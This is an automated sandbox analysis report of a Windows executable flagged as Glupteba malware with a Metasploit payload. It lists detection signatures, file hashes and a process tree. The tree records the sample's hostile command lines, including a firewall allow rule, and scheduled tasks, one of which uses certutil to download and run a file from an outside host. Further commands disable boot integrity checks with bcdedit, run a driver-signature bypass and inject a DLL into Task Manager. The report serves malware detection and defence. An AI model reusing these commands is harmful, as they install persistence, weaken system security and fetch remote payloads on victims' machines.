Analysis

  • max time kernel
    149s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    01/02/2024, 16:59

General

  • Target

    8769e7d465a0e734599c205f1c35bfc3.exe

  • Size

    4.5MB

  • MD5

    8769e7d465a0e734599c205f1c35bfc3

  • SHA1

    cfc03d84a30986eb523f14cc7a2c14a51e29dac9

  • SHA256

    e2840cc45332618eadf9af184fbffd46416f36c5d8e2fccaba3c7e73c475b92d

  • SHA512

    8551cc5e653e3d50379e7e5f4ba4adbfb89dfd9e4d5f8965f2c84fd9776383662b9e5d77cc51ed09ce5fda635d4c12db651fcf7abc1f3e615bc6b46b51d744d6

  • SSDEEP

    98304:85wRPUelTNSLI23eoWdYwOnkSx+vWFq1PUg0g4XQ7:85w6elR7yetikTvDNqg4g7

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 22 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 19 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8769e7d465a0e734599c205f1c35bfc3.exe
    "C:\Users\Admin\AppData\Local\Temp\8769e7d465a0e734599c205f1c35bfc3.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2088
    • C:\Users\Admin\AppData\Local\Temp\8769e7d465a0e734599c205f1c35bfc3.exe
      "C:\Users\Admin\AppData\Local\Temp\8769e7d465a0e734599c205f1c35bfc3.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3008
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:2176
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe /197-197
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2324
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:2528
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2212
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1124
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2964
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1120
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:696
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:876
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1680
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2196
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1468
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1696
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3064
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1944
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2924
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2580
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:2232
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2240
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240201170007.log C:\Windows\Logs\CBS\CbsPersist_20240201170007.cab
    1⤵
    • Drops file in Windows directory
    PID:2772

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    78c016291d8b1323f8f09e56bb435d30

    SHA1

    70ffecd763b1e284ad0af38c50576dd3ed619a08

    SHA256

    a25b83982bc67dcbd4a2ad48d6733db58eeb2f05bfb67eb1c1acde163461a863

    SHA512

    36df8de5ddaee900da42e795da091448d8b02864c358354e4fbb3803140bc40b4ac504e6c9cd9f334bd1c9858462b02648efe419322720948d0192e46cc38923

  • C:\Users\Admin\AppData\Local\Temp\CabF077.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

    Filesize

    8.3MB

    MD5

    fd2727132edd0b59fa33733daa11d9ef

    SHA1

    63e36198d90c4c2b9b09dd6786b82aba5f03d29a

    SHA256

    3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

    SHA512

    3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

  • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

    Filesize

    395KB

    MD5

    5da3a881ef991e8010deed799f1a5aaf

    SHA1

    fea1acea7ed96d7c9788783781e90a2ea48c1a53

    SHA256

    f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4

    SHA512

    24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

  • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

    Filesize

    192KB

    MD5

    6233a79fddcc41bb15fd8985e3e71f76

    SHA1

    01ae223be8a450f9b337b305b7f3417b9caf8180

    SHA256

    d44706bc8932fe3c10e7eea1cfb2f657bfcb30d94eb861101c3ec346ad44b5ce

    SHA512

    cd3a2778179b9e2c3738498ab69c10de60fbdd130454adb1b5a169f70bcbac9e4854db66be8e1af88d7ce801848f27f97b5bc807a08d22e3ddaad5d8a64659ac

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

    Filesize

    893B

    MD5

    d4ae187b4574036c2d76b6df8a8c1a30

    SHA1

    b06f409fa14bab33cbaf4a37811b8740b624d9e5

    SHA256

    a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

    SHA512

    1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    adf273fea218e133df3ac5b1a823d57f

    SHA1

    07d3bb2617cc4d37e4272377a7dc804a5b783eec

    SHA256

    2169c7a1da6200019fd2b7be2f97db1fedf5bc5a825b3584b272f82577fad7e1

    SHA512

    61be88a56eee7d34628524cffb2e74d139f04b6e786e30e2444a55e9269ad691d9da4f1ac26377b6cc8592df725368eb56a4b9d482e392fa74fdd2b3617d73eb

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    fb8ec0938a92ab89aedf85b2f42ecb8e

    SHA1

    22bc4f68991b8c9f309600c382a8649a663da581

    SHA256

    ea2816498187fea34670b48419e3c1e357a0b29d5b30e07724135354b4bb1693

    SHA512

    086e3e4e5d429fbc707f073660b4dcc23d65242d1572cd61d95e5fa0e0c905609e5a2fab71336942dbd36bed8419fccda07c547b489026c3a18026fe790dc03b

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    5ae595c389aef751a625506db0a873c1

    SHA1

    ae51458eb4dee1870f7539afcaed283a4618aa92

    SHA256

    29333fbbdc77bf5ab2945a861be175d4b392f0b86c4c510e1b13248aca97685c

    SHA512

    099ecd6f33d162087b836a57c49a35b16f5c774c364cf2a2c18eeef6071d46e4a99d58d766cc58ae9b0acfcc282f9e46ec30199a57dd7bf1a78f225813c7bc8a

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    7c34a08cf34f26ec28e2859b76f2a130

    SHA1

    564aa0c7953ed1b8b24044029bfbc0711981ad79

    SHA256

    02e715dbfd2d7f8214c8e19603cefca7445146dd1ed1ef1ec2776478b0cc613d

    SHA512

    f7273ae039602a2ef336e006d323d993c076df7e4ca300fac3adced550229e384263bf34a093895c7fd9eed8d748564c62d71632078a690f5716607816ed8a1d

  • C:\Windows\Temp\TarF06A.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Windows\rss\csrss.exe

    Filesize

    2.1MB

    MD5

    e27decfbc8f6e158ba75595cec63f52f

    SHA1

    b40d3048421e32f9ce8732770793f27170a561de

    SHA256

    edd9bf643f83ff977f79ec4573fd33f980c0ca79b750190b567fb9c31abe88aa

    SHA512

    3917b1fdc7dccb12e63870a62a385e6a7a693907bc92c59c87d916f19a16dd87600344aee458853b07a39c9842e89375ce0f5eafef37d7217764dbf583f40e51

  • C:\Windows\rss\csrss.exe

    Filesize

    3.6MB

    MD5

    60b5792fd9e992289f88e3bde8cf9177

    SHA1

    224462343b9aca632b4e9bb38bc7e739cecf12d7

    SHA256

    36d90e6943015ed71edd440fd80ffd8953f14804f738f5f24d1a49fcb6efa3b1

    SHA512

    e4209370f5a8b68d3e1d0f2209be90b218e1c8a1a177b0a81290cde6fed31249b354d3f2d4aa47440d9fa2f9c5bffd60b370dba5ffd8ae5f638a2d443db13b99

  • C:\Windows\rss\csrss.exe

    Filesize

    4.5MB

    MD5

    8769e7d465a0e734599c205f1c35bfc3

    SHA1

    cfc03d84a30986eb523f14cc7a2c14a51e29dac9

    SHA256

    e2840cc45332618eadf9af184fbffd46416f36c5d8e2fccaba3c7e73c475b92d

    SHA512

    8551cc5e653e3d50379e7e5f4ba4adbfb89dfd9e4d5f8965f2c84fd9776383662b9e5d77cc51ed09ce5fda635d4c12db651fcf7abc1f3e615bc6b46b51d744d6

  • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

    Filesize

    94KB

    MD5

    d98e78fd57db58a11f880b45bb659767

    SHA1

    ab70c0d3bd9103c07632eeecee9f51d198ed0e76

    SHA256

    414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

    SHA512

    aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

  • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

    Filesize

    281KB

    MD5

    d98e33b66343e7c96158444127a117f6

    SHA1

    bb716c5509a2bf345c6c1152f6e3e1452d39d50d

    SHA256

    5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

    SHA512

    705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll

    Filesize

    1.5MB

    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

    Filesize

    256KB

    MD5

    32ea70a49ea6cb004ae72f5e3a029a81

    SHA1

    bd6fa3a791e4829e0d6a41ea63c4f18892f5a03b

    SHA256

    8f7dfeebadae1ef9b2afc32d67dd787d5729b2c834273d696b623683ecdfad26

    SHA512

    af5a23a31066145d89be6a717e9c2584281156655734ef98fe4d1068262b4fd9948755c3c2b8bb6184bba81cbd3133a8d9501fd79025746d728ec5a8c0c93a89

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

    Filesize

    301KB

    MD5

    961c3d69052d7a2543cd2e680ccc884d

    SHA1

    ecded687b795f5ce822049f8e1e315cd591890e2

    SHA256

    518c8bdda536e3ba7adf5f7cb375ff6fa6b20e9a18773c0c81fa862e4c270334

    SHA512

    079a7d128e36f713407a9510e890172268b90e766d566e80a83a1fe126f638ae58193d98ae9527e3255664917f78f63a2c65d5c95e21a5efe424796452259d93

  • \Users\Admin\AppData\Local\Temp\osloader.exe

    Filesize

    591KB

    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • \Users\Admin\AppData\Local\Temp\symsrv.dll

    Filesize

    163KB

    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe

    Filesize

    1.8MB

    MD5

    9ab2255fff732e7593e5e0db4254334c

    SHA1

    5eda69434885122615e8284ca385b8da3d3907ee

    SHA256

    5a60bd2b3c0f45726e147ccd46db3f0c046e29d359a2a53a9bcad87413886b06

    SHA512

    8566910c6864ee9d577eb9a28fe292226502a25a82c2e4802ba0f5f696038404fd5899a16aa83d1cce7814b9148cb2e10c19b8117e3c0fd0273708f9cd4d13fd

  • \Windows\rss\csrss.exe

    Filesize

    3.1MB

    MD5

    90b5327917d2e015c7bc8f5cb261e12e

    SHA1

    a39412cfa1324c12b2fc1c826d4eb2c52d548f52

    SHA256

    6aa37dd4138c3c937a3991af5444240279a2250b0b623504ca494027f12d751e

    SHA512

    27eccae8f4a02b52929d957a37b7c574cd70f1c2de5c95a1b11ce8d921cfd13b9dfc06d74a25421db9ad9c619c753653bb183cf6446dd978849467b7bc89fc24

  • memory/1492-31-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

  • memory/1492-45-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

  • memory/2088-7-0x0000000002740000-0x0000000002B7C000-memory.dmp

    Filesize

    4.2MB

  • memory/2088-0-0x0000000002740000-0x0000000002B7C000-memory.dmp

    Filesize

    4.2MB

  • memory/2088-6-0x0000000002B80000-0x00000000034A6000-memory.dmp

    Filesize

    9.1MB

  • memory/2088-4-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2088-3-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2088-2-0x0000000002B80000-0x00000000034A6000-memory.dmp

    Filesize

    9.1MB

  • memory/2088-1-0x0000000002740000-0x0000000002B7C000-memory.dmp

    Filesize

    4.2MB

  • memory/2520-352-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-375-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-23-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-22-0x0000000002B00000-0x0000000003426000-memory.dmp

    Filesize

    9.1MB

  • memory/2520-21-0x00000000026C0000-0x0000000002AFC000-memory.dmp

    Filesize

    4.2MB

  • memory/2520-347-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-348-0x00000000026C0000-0x0000000002AFC000-memory.dmp

    Filesize

    4.2MB

  • memory/2520-20-0x00000000026C0000-0x0000000002AFC000-memory.dmp

    Filesize

    4.2MB

  • memory/2520-353-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-480-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-479-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-28-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-478-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-477-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-419-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-452-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-449-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-450-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2520-451-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2704-5-0x00000000029B0000-0x0000000002DEC000-memory.dmp

    Filesize

    4.2MB

  • memory/2704-8-0x00000000029B0000-0x0000000002DEC000-memory.dmp

    Filesize

    4.2MB

  • memory/2704-9-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2704-18-0x0000000000400000-0x0000000000D41000-memory.dmp

    Filesize

    9.3MB

  • memory/2704-19-0x00000000029B0000-0x0000000002DEC000-memory.dmp

    Filesize

    4.2MB